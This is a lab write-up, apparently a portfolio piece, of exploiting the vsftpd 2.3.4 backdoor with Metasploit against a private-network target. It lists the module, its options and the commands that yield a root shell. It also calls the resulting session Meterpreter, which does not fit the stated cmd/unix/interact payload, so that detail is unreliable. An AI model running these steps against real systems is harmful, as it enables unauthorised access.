Objective: To execute a remote command execution (RCE) exploit against a backdoored FTP service to gain unauthorized administrative access to the target host.
1. Exploitation Strategy
The target was identified as running vsftpd 2.3.4, which is susceptible to CVE-2011-2523. This vulnerability allows an attacker to trigger a shell by sending a specific sequence (a smiley face :)) in the FTP username. I utilized the Metasploit Framework (MSF) to automate the delivery and management of this exploit.
2. Technical Execution & Configuration
A critical part of this activity was the precise configuration of the Exploit Payload. I mapped the “Local Host” (Attacker) and “Remote Host” (Victim) to ensure the reverse connection bypassed potential networking errors.
| Module Variable | Value | Purpose |
|---|---|---|
| Exploit Module | unix/ftp/vsftpd_234_backdoor | The specific code targeting the vsftpd backdoor. |
| RHOSTS | 192.168.56.101 | The target infrastructure IP address. |
| LHOST | 192.168.56.1 | The attacker’s IP on the vboxnet0 interface. |
| Payload | cmd/unix/interact | The method of interacting with the spawned shell. |
3. Attack Lifecycle
- Module Selection: Initialized
msfconsoleand loaded thevsftpd_234_backdoormodule. - Environmental Validation: Ran
show optionsto confirm all parameters (IPs and Ports) were correctly set to avoid “noisy” or failed attempts. - Payload Delivery: Executed the
exploitcommand. The framework automatically handled the “handshake” and identified the triggered shell on Port 6200. - Session Establishment: Successfully opened Meterpreter Session 1, providing a high-level command-and-control (C2) interface.
4. Key Commands Used
msfconsole: To launch the penetration testing framework.use exploit/unix/ftp/vsftpd_234_backdoor: Loading the specific vulnerability module.set RHOSTS 192.168.56.101: Aiming the exploit at the target.exploit: Running the attack and establishing the connection.


5. Professional Impact
This activity demonstrates the ability to translate “Research” into “Action.” By successfully managing a Metasploit session, I proved proficiency in Remote Access Tooling. Furthermore, the transition from an unauthenticated FTP request to a full system shell highlights the catastrophic impact that unpatched, backdoored software can have on an organization’s security posture.
